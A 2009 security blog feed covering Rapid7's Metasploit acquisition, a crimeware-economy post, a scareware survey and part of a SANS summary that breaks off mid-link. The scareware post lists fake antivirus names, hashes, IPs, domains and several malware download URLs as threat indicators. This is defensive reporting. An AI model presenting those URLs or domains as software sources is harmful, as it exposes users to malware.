acquisition deepens our leadership as the leading provider of vulnerability management, compliance and penetration testing solutions and will provide great value for our customers and partners.&lt;br /&gt;&lt;br /&gt;As a result of the acquisition, we will leverage Metasploit technology to enhance our vulnerability management solution, Rapid7 NeXposeTM. At the same time we will not only maintain, but accelerate the open source framework Metasploit with dedicated resources and contributions. I’m also pleased to announce that HD Moore, the founder of Metasploit, will be joining Rapid7 full-time as Chief Architect of Metasploit and Chief Security Officer of Rapid7.&lt;br /&gt;&lt;br /&gt;I'm excited about this news for a number of reasons:&lt;br /&gt;&lt;br /&gt;The acquisition raises the bar to what our industry can expect from all those involved, be they vendors, end-users, partners or community members. Since joining Rapid7, I’ve learned about some of the key principles of network security: defense in depth, continuously identifying and fixing your vulnerabilities, and improving security through continuous investments in people, process, and technology. With this announcement we are embracing the role of industry innovator by providing better protection to you as our client, feeding the community and creating an environment open for dialog about the implementation of security best practices.&lt;br /&gt;As a result of our union, we will be able to bring superior data on exploitability to our customers, helping them to prioritize and remediate key security issues. The exploit data will be directly embedded in our vulnerability management solution NeXpose, providing a whole new level of risk analysis capabilities to our clients, while ensuring that NeXpose, which will continue as a separate product, delivers the safest, most proactive and actionable vulnerability scanning capabilities in the industry.&lt;br /&gt;We're thrilled that HD Moore and other key Metasploit contributors have joined Rapid7 to work full-time on the open source Metasploit Framework code. HD and the team will now have more dedicated resources and support to invest in exploit research and to create a broader penetration testing platform. As part of our support of the community, we will contribute vulnerability data from the NeXpose product to expand the accuracy and reliability of the Metasploit Framework, which will remain open source. It is a true win-win for everyone.&lt;br /&gt;Finally, the combination of NeXpose and Metasploit will enable Rapid7 to continue to grow its relationship with partners and consultants, delivering improved technology and more comprehensive solutions for vulnerability management and penetration testing. Having a broader portfolio will further accelerate our dialog with our partner ecosystem to ensure that our solutions meet their needs.&lt;br /&gt;Over the next weeks we will be providing additional details on our plans so please stay tuned to hear more from us. For additional information, please reference our press release on the acquisition as well as the FAQ below. If you have any feedback or suggestions regarding our announcement, I would love to hear from you.&lt;br /&gt;&lt;br /&gt;Mike Tuchen, &lt;br /&gt;President &amp; CEO, Rapid7 &lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;**********COPIED AND PASTED FROM &lt;a href="http://www.rapid7.com/metasploit-announcement.jsp"&gt;HERE&lt;/a&gt;*******&lt;br /&gt;&lt;br /&gt;For FAQ on this go &lt;a href="http://www.rapid7.com/metasploit-announcement.jsp"&gt;HERE&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-5240531398009902242?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/5240531398009902242/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=5240531398009902242' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5240531398009902242'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5240531398009902242'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/metasploit-acquired-by-rapid7.html' title='Metasploit Acquired by Rapid7'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-3928983101879608629</id><published>2009-10-21T00:19:00.002-11:00</published><updated>2009-10-21T00:21:33.043-11:00</updated><title type='text'>Computer Weekly IT Blog Awards 2009</title><content type='html'>Computer Weekly is coming up with the &lt;a href="http://www.computerweekly.com/Articles/2009/09/14/237679/it-blog-awards-2009-name-your-favourite-blogger.htm"&gt;IT Blog Awards 2009&lt;/a&gt;. Thanks to Kalyan for sending a reminder email. We have enrolled "EvilFingers Blog" in the nominees. If you think that we are good for this award, kindly VOTE for us.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-3928983101879608629?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/3928983101879608629/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=3928983101879608629' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3928983101879608629'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3928983101879608629'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/computer-weekly-it-blog-awards-2009.html' title='Computer Weekly IT Blog Awards 2009'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-7015798765768269988</id><published>2009-10-18T04:36:00.001-11:00</published><updated>2009-10-18T04:42:34.857-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='Crimeware'/><title type='text'>Current business outlook caused by crimeware</title><content type='html'>Undoubtedly, the current picture of global criminal activities that are channeled through the web form a round, dark business that is happening in the most underground of the different environments of the Internet, stealing private information through different "bugs"...&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/StolT0NXSFI/AAAAAAAAB2w/mucLvJ1BSpo/s1600-h/mipistus_crimeware_Digital-Underground.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 266px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/StolT0NXSFI/AAAAAAAAB2w/mucLvJ1BSpo/s400/mipistus_crimeware_Digital-Underground.png" alt="" id="BLOGGER_PHOTO_ID_5393664526092027986" border="0" /&gt;&lt;/a&gt;...that spread running different "plans" strategically designed, including developing applications to automate processes that are marketed criminal in the same environment underground, then transform everything into cash.&lt;br /&gt;&lt;br /&gt;Without further ado ... image sums it up :)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Related information&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/cybint-en-el-negocio-de-los-ciber.html"&gt;CYBINT en el negocio de los ciber-delincuentes rusos&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/07/software-as-service-en-la-industria-del.html"&gt;Software as a Service en la industria del malware&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/los-precios-del-crimeware-ruso-parte-2.html"&gt;Los precios del crimeware ruso. Parte 2&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/03/los-precios-del-crimware-ruso.html"&gt;Los precios del crimeware ruso. Parte 1&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/comercio-ruso-de-versiones-privadas-de.html"&gt;Comercio Ruso de versiones privadas de crimeware...&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/07/automatizacion-de-procesos-anti.html"&gt;Automatización de procesos anti-análisis II&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-7015798765768269988?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/7015798765768269988/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=7015798765768269988' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7015798765768269988'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7015798765768269988'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/current-business-outlook-caused-by.html' title='Current business outlook caused by crimeware'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Ppq0fEGkHo4/StolT0NXSFI/AAAAAAAAB2w/mucLvJ1BSpo/s72-c/mipistus_crimeware_Digital-Underground.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-2773785479218316190</id><published>2009-10-17T05:20:00.003-11:00</published><updated>2009-10-17T05:28:06.872-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='rogue'/><category scheme='http://www.blogger.com/atom/ns#' term='scareware'/><title type='text'>A recent tour of scareware XVI</title><content type='html'>&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;Advanced Virus Remover&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Ppq0fEGkHo4/SraXCMbAUeI/AAAAAAAAByQ/ylqB9dSEhVU/s1600-h/avr.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 140px; height: 112px;" src="http://1.bp.blogspot.com/_Ppq0fEGkHo4/SraXCMbAUeI/AAAAAAAAByQ/ylqB9dSEhVU/s200/avr.png" alt="" id="BLOGGER_PHOTO_ID_5383656468518031842" border="0" /&gt;&lt;/a&gt;MD5: b3f4e680db0b4093737093afc5bd7ddd&lt;br /&gt;IP: 92.241.177.207 &lt;img src="http://img.domaintools.com/flags/ru.gif" alt="Russian Federation" width="18" height="12" /&gt;&lt;br /&gt;Dominios asociados&lt;br /&gt;1-vscodec-pro.com&lt;br /&gt;10-open-davinci.com&lt;br /&gt;advanced-virus-remover-2009.com&lt;br /&gt;advanced-virus-remover2009.com&lt;br /&gt;advanced-virusremover2009.com&lt;br /&gt;advancedvirus-remover-2009.com&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SraXoXGAfaI/AAAAAAAAByY/JbXcuYau6ZE/s1600-h/as-vmr.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 180px; height: 320px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SraXoXGAfaI/AAAAAAAAByY/JbXcuYau6ZE/s320/as-vmr.png" alt="" id="BLOGGER_PHOTO_ID_5383657124217781666" border="0" /&gt;&lt;/a&gt;antivirus-2009-ppro.com&lt;br /&gt;antivirus-scan-2009.com&lt;br /&gt;best-scanpc.com&lt;br /&gt;bestscanpc.com&lt;br /&gt;bestscanpc.info&lt;br /&gt;bestscanpc.net&lt;br /&gt;blue-xxx-tube.com&lt;br /&gt;downloadavr3.com&lt;br /&gt;downloadavr4.com&lt;br /&gt;onlinescanxppro.com&lt;br /&gt;testavrdown.com&lt;br /&gt;trucountme.com&lt;br /&gt;vscodec-pro.com&lt;br /&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255); font-weight: bold;" href="http://www.virustotal.com/analisis/c76bdb02382237753f4e4fde17e699d231348635128673a4071b72a9ddddece3-1253454146"&gt;Result: &lt;/a&gt;&lt;span id="porcentaje"&gt;&lt;a style="color: rgb(51, 51, 255); font-weight: bold;" href="http://www.virustotal.com/analisis/c76bdb02382237753f4e4fde17e699d231348635128673a4071b72a9ddddece3-1253454146"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;21&lt;/span&gt;/41 (51.22%)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;securitycentr.com (195.24.78.186), webscannertools.com    (212.117.165.126) - &lt;img src="http://img.domaintools.com/flags/lu.gif" alt="Luxembourg" width="18" height="12" /&gt;       &lt;br /&gt;antivir-freescan.com/&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/4cd2e550f3aa26fc96d9fb4b5183f3665fccc3d97b6111a31de2ffb41e4eb5fe-1254310625"&gt;online&lt;/a&gt; (213.163.64.81) - &lt;img src="http://img.domaintools.com/flags/nl.gif" alt="Netherlands" width="18" height="12" /&gt;&lt;br /&gt;computervirusscanner31.com/scan1 (213.163.89.60) -                    &lt;img src="http://img.domaintools.com/flags/nl.gif" alt="Netherlands" width="18" height="12" /&gt;       &lt;br /&gt;benharpergals.com/?pid=162&amp;amp;sid=c3d08e (89.248.174.61) - &lt;img src="http://img.domaintools.com/flags/nl.gif" alt="Netherlands" width="18" height="12" /&gt;&lt;br /&gt;iniegox.cn/installer.1.exe (91.213.29.250) - &lt;img src="http://img.domaintools.com/flags/ru.gif" alt="Russian Federation" width="18" height="12" /&gt;       &lt;br /&gt;avidentify.com    (91.206.201.8) - &lt;img src="http://img.domaintools.com/flags/ua.gif" alt="Ukraine" width="18" height="12" /&gt;       &lt;br /&gt;scan.helpyourpcsecuritynow.com/download/smrtprt/&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/69f49d3dfbc7095150c5b9832463ca0366f9198d14ed0a003628af85c668f414-1254305915"&gt;install.php&lt;/a&gt; (195.95.151.185) - &lt;img src="http://img.domaintools.com/flags/ua.gif" alt="Ukraine" width="18" height="12" /&gt;&lt;br /&gt;goxtrascan.com    (91.212.107.103) - &lt;img src="http://img.domaintools.com/flags/cy.gif" alt="Cyprus" width="18" height="12" /&gt;&lt;br /&gt;virushooker.com    (206.53.61.73) -                    &lt;img src="http://img.domaintools.com/flags/ca.gif" alt="Canada" width="18" height="12" /&gt;       &lt;br /&gt;fastscansearch.net (64.86.16.101), globalscansearch.com (64.86.16.130), totalscansearch.com (64.86.16.100), totalscansearch.net (64.86.16.124) - &lt;img src="http://img.domaintools.com/flags/ca.gif" alt="Canada" width="18" height="12" /&gt;&lt;br /&gt;securitycodereviews.com/install/&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/5e4da620894f80a07745a69b15587a0abf3dced3c7dfd75078fb00dbc8ca06e2-1254316443"&gt;ws.exe&lt;/a&gt;, bestwebsitesecurity.com (62.90.136.237) - &lt;img src="http://img.domaintools.com/flags/il.gif" alt="Israel" width="18" height="12" /&gt;       &lt;br /&gt;weedruk.com/download (91.212.127.132) - &lt;img src="http://img.domaintools.com/flags/uk.gif" alt="United Kingdom" width="18" height="12" /&gt;&lt;br /&gt;mycompscanner42.com (206.217.201.240), myvirusscanner2.com (206.217.201.136) - &lt;img src="http://img.domaintools.com/flags/us.gif" alt="United States" width="18" height="12" /&gt;&lt;br /&gt;myvirusscanner25.com/2 (69.4.230.204) - &lt;img src="http://img.domaintools.com/flags/us.gif" alt="United States" width="18" height="12" /&gt;       &lt;br /&gt;fp.outerinfo.com/dispatcher.php, outerinfo.com (63.251.135.18) - &lt;img src="http://img.domaintools.com/flags/us.gif" alt="United States" width="18" height="12" /&gt;&lt;br /&gt;block-spyware.co.cc/&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/35a7f2ee3478058730ce45990cf8be8216a2e17b700f3dd8f1831053607149ba-1254292439"&gt;htm6.exe&lt;/a&gt; (78.46.129.170) - &lt;img src="http://img.domaintools.com/flags/de.gif" alt="Germany" width="18" height="12" /&gt;&lt;br /&gt;safefighter.com (83.233.30.66) - &lt;img src="http://img.domaintools.com/flags/se.gif" alt="Sweden" width="18" height="12" /&gt;&lt;br /&gt;keymydomains.com (193.169.12.26) - &lt;img src="http://img.domaintools.com/flags/bz.gif" alt="Belize" width="18" height="12" /&gt;       &lt;br /&gt;trustsoldier.com (212.175.87.195) - &lt;img src="http://img.domaintools.com/flags/tr.gif" alt="Turkey" width="18" height="12" /&gt;       &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;Perfect Defender 2009&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Srah90A8YBI/AAAAAAAAByg/5ded5UTCuO4/s1600-h/pd.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 147px; height: 110px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Srah90A8YBI/AAAAAAAAByg/5ded5UTCuO4/s200/pd.png" alt="" id="BLOGGER_PHOTO_ID_5383668487874699282" border="0" /&gt;&lt;/a&gt;IP: 206.161.120.40&lt;br /&gt;&lt;img src="http://img.domaintools.com/flags/us.gif" alt="United States" width="18" height="12" /&gt;         United States        Herndon        Beyond The Network America Inc&lt;br /&gt;Dominios asociados&lt;br /&gt;agelesscommunity.com, air-titaniumusa.com, alcohol-treatmentcenter.com, antigreen.org, arkansasrobotics.com, barry-miller.com, brianperez.com, cocainedrugtreatment.com, combat-camera.com, pcfender.com, pcfsupport.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;PC MightyMax&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SsTWNTNolpI/AAAAAAAAB0Q/M_g4yzDzVuQ/s1600-h/pcmm.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 137px; height: 124px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SsTWNTNolpI/AAAAAAAAB0Q/M_g4yzDzVuQ/s200/pcmm.png" alt="" id="BLOGGER_PHOTO_ID_5387666578226058898" border="0" /&gt;&lt;/a&gt;MD5: e630ee28e264d060562cb567e7fa5ed0&lt;br /&gt;IP: 208.38.128.164&lt;br /&gt;        &lt;img src="http://img.domaintools.com/flags/us.gif" alt="United States" width="18" height="12" /&gt;         United States        Valrico        Sonbry Marking International&lt;br /&gt;Dominios asociados&lt;br /&gt;pc-mm.com&lt;br /&gt;pcmightymax.net&lt;br /&gt;dllfix.net&lt;br /&gt;pc-test.com&lt;br /&gt;pcmightymax.net&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255); font-weight: bold;" href="http://www.virustotal.com/analisis/fcf6d6f7fe40016bf03e760b13180581f274be2d31509f3de220f1e55d7eac7c-1254413217"&gt;Result: &lt;span id="porcentaje"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;1&lt;/span&gt;/41 (2.44%)&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;Nortel Antivirus&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/StDf4WU2WVI/AAAAAAAAB1g/ljyU-tv1T5Y/s1600-h/nortel.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 138px; height: 104px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/StDf4WU2WVI/AAAAAAAAB1g/ljyU-tv1T5Y/s200/nortel.png" alt="" id="BLOGGER_PHOTO_ID_5391054913121179986" border="0" /&gt;&lt;/a&gt;IP: 174.142.96.6&lt;br /&gt;&lt;img src="http://img.domaintools.com/flags/ca.gif" alt="Canada" width="18" height="12" /&gt;         Canada        Montreal        Iweb Technologies Inc&lt;br /&gt;Dominios asociados&lt;br /&gt;nortel-antivirus-pro.com&lt;br /&gt;nortel2010.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;Screen-Spy&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/StDq_vpzq5I/AAAAAAAAB1o/1HMkRRBXkWk/s1600-h/screen-spy.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 145px; height: 85px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/StDq_vpzq5I/AAAAAAAAB1o/1HMkRRBXkWk/s200/screen-spy.png" alt="" id="BLOGGER_PHOTO_ID_5391067134806961042" border="0" /&gt;&lt;/a&gt;MD5: 21b5e0a17c057a281b6e7a90c3f8ce7a&lt;br /&gt;IP: 208.109.106.46&lt;br /&gt;&lt;img src="http://img.domaintools.com/flags/us.gif" alt="United States" width="18" height="12" /&gt;         United States        Scottsdale        Godaddy.com Inc&lt;br /&gt;Dominios asociados&lt;br /&gt;logserver39.com, acespy.com, pchealthoptimizer.com, retinaxstudios.com, screen-spy.com, loanmodcrm.org&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255); font-weight: bold;" href="http://www.virustotal.com/analisis/21f28e49b0f01fed2e6c41fa831a7539cc7b47d85d12a74912310427a08acc78-1255202673"&gt;Result: &lt;span id="porcentaje"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;17&lt;/span&gt;/41 (41.46%)&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;SaferScan&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Ppq0fEGkHo4/StDx6iA8PfI/AAAAAAAAB1w/mM8knGOTOKU/s1600-h/saferscan.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 151px; height: 111px;" src="http://1.bp.blogspot.com/_Ppq0fEGkHo4/StDx6iA8PfI/AAAAAAAAB1w/mM8knGOTOKU/s200/saferscan.png" alt="" id="BLOGGER_PHOTO_ID_5391074741827943922" border="0" /&gt;&lt;/a&gt;MD5: cb9022235cc4ae3adc9f54cd49b81bf5&lt;br /&gt;IP: 66.152.93.119&lt;br /&gt;&lt;img src="http://img.domaintools.com/flags/ca.gif" alt="Canada" width="18" height="12" /&gt;         Canada                Integrated Search Technologies&lt;br /&gt;Dominios asociados&lt;br /&gt;activexcash.net, instaldownload.com, installcash.com, power-scan.com, safer-scan.com, sexsearchbar.com, toolbarcash.com,&lt;br /&gt;unlimitedsongs.net, xxxtoolbar.com&lt;br /&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255); font-weight: bold;" href="http://www.virustotal.com/analisis/77b55e6d5bf4a606a9ab253c1568aab2ea347d7660d19a31451633dd4e5c6414-1255202290"&gt;Result:&lt;span style="color: rgb(255, 0, 0);"&gt; &lt;/span&gt;&lt;span id="porcentaje"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;23&lt;/span&gt;/41 (56.10%)&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Información relacionada&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/una-recorrida-por-los-ultimos-scareware_26.html"&gt;Una recorrida por los últimos scareware XV&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware XIV&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/una-recorrida-por-los-ultimos-scareware_24.html"&gt;Una recorrida por los últimos scareware XIII&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware XII&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/07/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware XI&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/una-recorrida-por-los-ultimos-scareware_29.html"&gt;Una recorrida por los últimos scareware X&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware IX&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/05/una-recorrida-por-los-ultimos-scareware_29.html"&gt;Una recorrida por los últimos scareware VIII&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/05/una-recorrida-por-los-ultimos-scareware_10.html"&gt;Una recorrida por los últimos scareware VII&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/05/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware VI&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/03/una-recorrida-por-lo-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware V&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/02/una-recorrida-por-los-ultimos-scareware_24.html"&gt;Una recorrida por los últimos scareware IV&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/02/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware III&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/01/una-recorrida-por-los-ltimos-scareware_17.html"&gt;Una recorrida por los últimos scareware II&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/01/una-recorrida-por-los-ltimos-scareware.html"&gt;Una recorrida por los últimos scareware I&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-2773785479218316190?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/2773785479218316190/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=2773785479218316190' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2773785479218316190'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2773785479218316190'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/recent-tour-of-scareware-xvi.html' title='A recent tour of scareware XVI'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Ppq0fEGkHo4/SraXCMbAUeI/AAAAAAAAByQ/ylqB9dSEhVU/s72-c/avr.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-8833350839206246843</id><published>2009-10-16T09:15:00.002-11:00</published><updated>2009-10-16T09:33:57.070-11:00</updated><title type='text'>15 day summary - SANS - Cyber Security Awareness Month</title><content type='html'>This is a great initiative taken by SANS.&lt;br /&gt;&lt;br /&gt;Day 15 - &lt;a href="http://isc.sans.org/diary.html?storyid=7366"&gt;Ports 995, 465, and 993 - Secure Email&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 14 - &lt;a href="http://isc.sans.org/diary.html?storyid=7351"&gt;port 514 - syslog&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 13 - &lt;a href="http://isc.sans.org/diary.html?storyid=7339"&gt;Proxies (TCP 3128, 8080 &amp; ......)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 12 - &lt;a href="http://isc.sans.org/diary.html?storyid=7327"&gt;Ports 161/162 Simple Network Management Protocol (SNMP)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 11 - &lt;a href="http://isc.sans.org/diary.html?storyid=7324"&gt;RPCBind aka Portmapper&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 10 - &lt;a href="http://isc.sans.org/diary.html?storyid=7318"&gt;The Questionable Ports&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 09 - &lt;a href="http://isc.sans.org/diary.html?storyid=7303"&gt;Port 3389/tcp (RDP)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Day 08 - &lt;a 